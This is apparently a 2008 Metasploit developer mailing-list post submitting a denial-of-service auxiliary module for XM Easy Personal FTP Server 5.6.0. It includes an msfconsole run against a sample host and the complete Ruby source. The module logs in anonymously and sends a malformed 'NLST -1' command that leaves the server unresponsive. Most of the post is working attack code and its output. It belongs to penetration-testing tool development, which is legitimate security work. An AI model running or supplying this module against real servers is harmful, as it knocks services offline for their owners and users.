-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hey guys,
I've attached a new DoS auxiliary module for the XM Easy Personal FTP Server
5.6.0. In testing I've noticed that the server still technically listens for
connections, but it doesn't do any good.
msf > use dos/windows/ftp/xmeasy560_nlst
msf auxiliary(xmeasy560_nlst) > set RHOST 192.168.10.2
RHOST => 192.168.10.2
msf auxiliary(xmeasy560_nlst) > set FTPUSER anonymous
FTPUSER => anonymous
msf auxiliary(xmeasy560_nlst) > set FTPPASS anonymous
FTPPASS => anonymous
msf auxiliary(xmeasy560_nlst) > run
[*] Connecting to FTP server 192.168.10.2:21...
[*] Connected to target FTP server.
[*] Authenticating as anonymous with password anonymous...
[*] Sending password...
[*] OK, server may still be technically listening, but it won't respond
[*] Auxiliary module execution completed
msf auxiliary(xmeasy560_nlst) > info
Name: XM Easy Personal FTP Server 5.6.0 NLST DoS
Version: 1
Provided by:
Kris Katterjohn <[EMAIL PROTECTED]>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FTPPASS anonymous yes Valid FTP password for username
FTPUSER anonymous yes Valid FTP username
RHOST 192.168.10.2 yes The target address
RPORT 21 yes The target port
Description:
This module is a port of shinnai's script. You need a valid login,
but even anonymous can do it as long as it has permission to call
NLST.
Thanks,
Kris Katterjohn
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iQIVAwUBSPPHEv9K37xXYl36AQKDIQ/8DewBfrc1BA+MkMfLvCKOkN/ofcX0owqh
9zdBMHyIRUs/x2j+RVrWZR0UYn4T8uEJuH14WeTO9nVkTmdeTtni1lQNjpnQKTCK
XsAKOQz+V6qWkL1g549tEmIG0D99tEbormFTR7xkGOuA0zoNN6RGyV+WItH1w+DU
kMYPS44ROjjMm4koA2CQmeEH41ZWhGMy70G29ap53EE5eH4n4plhEHZpmCBBkWWb
hvwHb2n7iM6w1UZHc/8w9o6fR2oBXbjxV/vhG2Nb3iNS/q9f893XKiP3Ud/HHxgO
bulRYNOBDJpjqjol4cEcq/J8M5MAp8CN/XoQIuUYMKwvbZOX7wJx/T9fbZ/XX/+r
G94g4b1OtS1WR/huo0TUPmrojO+VbbnbCu91qHBrdscK6c7UgbFhsi7yuvTtZrRx
fJpLt0kJlUU4ODLoCabIof02ssi44p0f4qZqkTHYEzZLtBvwwlvdDZV3p479GF2+
Ekzyjdypapn8M3cmPpCCIIc3RnZZCPeHjwJoYxypTbCFwsxGSjpxiFA2z699AYpH
ky3Vb74O7fAqh/9eXKSew5YLxvYlM4pDB46pbh/9lTDgrLavbvWl/dsLDX7LBeF+
IWMBLOkFWNzFiRNVx+1gcu5t+s4pzDDiv5SaIlvAe/ujV9E1NRautMriRwRjWgQk
pZVH/BvRiEM=
=abWG
-----END PGP SIGNATURE-----
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'XM Easy Personal FTP Server 5.6.0
NLST DoS',
'Description' => %q{
This module is a port of shinnai's script. You
need
a valid login, but even anonymous can do it as
long
as it has permission to call NLST.
},
'Author' => 'Kris Katterjohn <[EMAIL
PROTECTED]>',
'License' => MSF_LICENSE,
'Version' => '1',
'References' =>
[ [ 'URL', 'http://milw0rm.com/exploits/6741']
],
'DisclosureDate' => 'Oct 13 2008'))
# They're required
register_options([
OptString.new('FTPUSER', [ true, 'Valid FTP username',
'anonymous' ]),
OptString.new('FTPPASS', [ true, 'Valid FTP password
for username', 'anonymous' ])
])
end
def run
connect_login
raw_send("NLST -1\r\n")
disconnect
print_status("OK, server may still be technically listening,
but it won't respond")
end
end
_______________________________________________
Framework-Hackers mailing list
Framework-Hackers@spool.metasploit.com
http://spool.metasploit.com/mailman/listinfo/framework-hackers
